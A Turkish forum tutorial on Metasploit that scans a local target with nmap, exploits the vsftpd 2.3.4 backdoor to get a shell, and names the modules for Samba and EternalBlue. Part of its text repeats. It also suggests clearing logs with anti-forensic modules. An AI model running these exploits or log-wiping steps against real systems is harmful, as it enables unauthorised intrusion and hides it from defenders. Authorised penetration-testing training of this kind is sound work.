Merhabalar!
Ben @Sarraf, Lojistik grup adına paylaşılan Metasploit ile Servis Zafiyet Testi makalesinde sizi görmekten mutluyum.
Eğer hazırsanız, başlayalım!
Siber güvenlik dünyasında en çok kullanılan araçlardan biri olan Metasploit Framework, zafiyet testleri ve sızma testlerinde kritik bir rol oynar. Bu yazıda, Metasploit kullanarak bir sistemdeki servisin zafiyetini nasıl tespit ederiz ve sömürme (exploit) süreci nasıl işler, adım adım ele alacağız.
Metasploit Framework, açık kaynaklı bir sızma testi aracıdır. İçeriğinde yüzlerce exploit, payload, yardımcı araç ve zafiyet tarayıcısı barındırır. Özellikle Kali Linux gibi dağıtımlar ile birlikte önceden yüklenmiş olarak gelir.
Öncelikle zafiyet testine başlamadan önce hedef sistemin IP adresi ve çalıştırdığı servisler hakkında bilgi toplamalıyız. Bu aşamada Nmap ile tarama yaparak açık portları ve servisleri belirleyebiliriz:
Örnek çıktı:
Bu çıktıda vsftpd 2.3.4 sürümünün bilinen bir arka kapı zafiyeti (CVE-2011-2523) olduğu anlaşılabilir.
Metasploit konsolunu başlatmak için terminale şu komutu girin:
Ardından exploit araması yapalım:
Sonuç:
Exploit’i kullan:
Hedef bilgilerini gir:
Payload’ı otomatik olarak seçtiği gibi bırakabilirsiniz, ancak manuel seçim de mümkündür:
Her şey hazırsa aşağıdaki komutla saldırıyı başlatabilirsiniz:
Eğer zafiyet başarıyla sömürülürse, shell (kabuk) erişimi elde edersiniz:
Artık hedef sistem üzerinde komutlar çalıştırabilirsiniz:
7. Diğer Örnek Exploit Senaryoları
Metasploit, yalnızca bir zafiyet sömürme aracı değil, aynı zamanda profesyonel bir sızma testi platformudur. Servis zafiyet testi yapmak, sadece açık portları bulmaktan öteye gider — hedef sistemde çalışan servislerin sürümleri, yapılandırmaları ve bilinen açıkları göz önünde bulundurularak titiz bir analiz gerektirir.
Yasal ve etik sınırlar içinde kaldığınız sürece, bu beceriler siber güvenlik alanında sizi bir adım öne çıkaracaktır.
Makalemizi okuduğunuz için teşekkür ederiz!
Yorum yapmayı ve beğenmeyi unutmayın!
Ben @Sarraf, Lojistik grup adına paylaşılan Metasploit ile Servis Zafiyet Testi makalesinde sizi görmekten mutluyum.
Eğer hazırsanız, başlayalım!
Metasploit ile Servis Zafiyet Testi
Siber güvenlik dünyasında en çok kullanılan araçlardan biri olan Metasploit Framework, zafiyet testleri ve sızma testlerinde kritik bir rol oynar. Bu yazıda, Metasploit kullanarak bir sistemdeki servisin zafiyetini nasıl tespit ederiz ve sömürme (exploit) süreci nasıl işler, adım adım ele alacağız.
1. Metasploit Nedir?
Metasploit Framework, açık kaynaklı bir sızma testi aracıdır. İçeriğinde yüzlerce exploit, payload, yardımcı araç ve zafiyet tarayıcısı barındırır. Özellikle Kali Linux gibi dağıtımlar ile birlikte önceden yüklenmiş olarak gelir.
2. Hedef Belirleme ve Bilgi Toplama
Öncelikle zafiyet testine başlamadan önce hedef sistemin IP adresi ve çalıştırdığı servisler hakkında bilgi toplamalıyız. Bu aşamada Nmap ile tarama yaparak açık portları ve servisleri belirleyebiliriz:
Kod:
bash
nmap -sV -Pn 192.168.1.10
Örnek çıktı:
Kod:
pgsql
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
80/tcp open http Apache httpd 2.2.14
Bu çıktıda vsftpd 2.3.4 sürümünün bilinen bir arka kapı zafiyeti (CVE-2011-2523) olduğu anlaşılabilir.
3. Metasploit'i Başlatma
Metasploit konsolunu başlatmak için terminale şu komutu girin:
Kod:
bash
msfconsole
Ardından exploit araması yapalım:
Kod:
bash
search vsftpd 2.3.4
Sonuç:
Kod:
bash
exploit/unix/ftp/vsftpd_234_backdoor
4. Exploit Seçimi ve Yapılandırması
Exploit’i kullan:
Kod:
bash
use exploit/unix/ftp/vsftpd_234_backdoor
Hedef bilgilerini gir:
Kod:
bash
set RHOSTS 192.168.1.10
set RPORT 21
Payload’ı otomatik olarak seçtiği gibi bırakabilirsiniz, ancak manuel seçim de mümkündür:
Kod:
bash
show payloads
set PAYLOAD cmd/unix/interact
5. Exploit’i Çalıştırma
Her şey hazırsa aşağıdaki komutla saldırıyı başlatabilirsiniz:
Kod:
bash
run
Eğer zafiyet başarıyla sömürülürse, shell (kabuk) erişimi elde edersiniz:
Kod:
bash
[*] Command shell session 1 opened...
Artık hedef sistem üzerinde komutlar çalıştırabilirsiniz:
Kod:
bash
whoami
uname -a
6. Zafiyet Testinde Dikkat Edilmesi Gerekenler
- Bu tür testler mutlaka izinli ortamlarda yapılmalıdır.
- Hedef sisteme zarar verebilecek payloadlar dikkatle seçilmelidir.
- Bazı exploit'ler sistemi çökertebilir, dikkatli olun.
- Geriye log bırakmamak için anti-forensic modüller kullanılabilir (örn: clearev).
7. Diğer Örnek Exploit Senaryoları
a) Samba zafiyeti (CVE-2017-7494):
Kod:
bash
use exploit/linux/samba/is_known_pipename
b) MS17-010 EternalBlue (Windows):
Kod:
bash
use exploit/windows/smb/ms17_010_eternalblue
8. Kaynaklar ve Gelişmiş Kullanım
- searchsploit komutu ile Exploit-DB veritabanından zafiyet aramaları yapabilirsiniz.
- db_nmap komutu ile Metasploit içinde doğrudan Nmap taraması yapabilirsiniz.
- post modülleri ile başarı sonrası sistem hakkında daha fazla bilgi toplayabilirsiniz.
Metasploit, yalnızca bir zafiyet sömürme aracı değil, aynı zamanda profesyonel bir sızma testi platformudur. Servis zafiyet testi yapmak, sadece açık portları bulmaktan öteye gider — hedef sistemde çalışan servislerin sürümleri, yapılandırmaları ve bilinen açıkları göz önünde bulundurularak titiz bir analiz gerektirir.
Yasal ve etik sınırlar içinde kaldığınız sürece, bu beceriler siber güvenlik alanında sizi bir adım öne çıkaracaktır.
Makalemizi okuduğunuz için teşekkür ederiz!
Yorum yapmayı ve beğenmeyi unutmayın!
LOJİSTİK TİM SUNDU

